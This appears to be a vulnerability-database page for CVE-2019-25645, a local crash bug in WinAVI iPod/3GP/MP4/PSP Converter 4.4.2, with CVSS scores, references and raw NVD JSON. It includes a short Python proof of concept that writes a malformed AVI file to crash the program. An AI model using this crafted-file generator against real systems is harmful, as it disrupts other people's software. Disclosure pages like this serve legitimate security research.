CVE-2019-25645

Description

WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by processing malformed AVI files. Attackers can create a specially crafted AVI file with an oversized buffer and load it through the Convert to iPhone function to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WinAVI iPod/3GP/MP4/PSP Converter 4.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# PoC for CVE-2019-25645
# Description: Generates a malformed AVI file with an oversized buffer to trigger DoS.

filename = "exploit.avi"

# Basic AVI file header structure
riff_header = b"RIFF"
riff_size = struct.pack('<I', 0xFFFFFFFF) # Malformed size
file_type = b"AVI "

list_header = b"LIST"
list_size = struct.pack('<I', 0xFFFFFFFF) # Malformed size
list_type = b"hdrl"

# Junk data to simulate oversized buffer
junk_buffer = b"A" * 10000

# Construct the malformed file
payload = riff_header + riff_size + file_type + list_header + list_size + list_type + junk_buffer

with open(filename, "wb") as f:
    f.write(payload)

print(f"[+] Created {filename}. Load this in WinAVI Converter to trigger the crash.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25645
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25645
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25645/
[4] VulDB https://vuldb.com/cve/CVE-2019-25645
[5] http://www.winavi.com
[6] http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe
[7] https://www.exploit-db.com/exploits/46554
[8] https://www.vulncheck.com/advisories/winavi-ipod-3gp-mp4-psp-converter-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25645", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:07.030", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by processing malformed AVI files. Attackers can create a specially crafted AVI file with an oversized buffer and load it through the Convert to iPhone function to trigger an application crash."}, {"lang": "es", "value": "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales provocar el fallo de la aplicación al procesar archivos AVI malformados. Los atacantes pueden crear un archivo AVI especialmente diseñado con un búfer sobredimensionado y cargarlo a través de la función Convertir a iPhone para desencadenar un fallo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-226"}]}], "references": [{"url": "http://www.winavi.com", "source": "[email protected]"}, {"url": "http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46554", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/winavi-ipod-3gp-mp4-psp-converter-denial-of-service", "source": "[email protected]"}]}}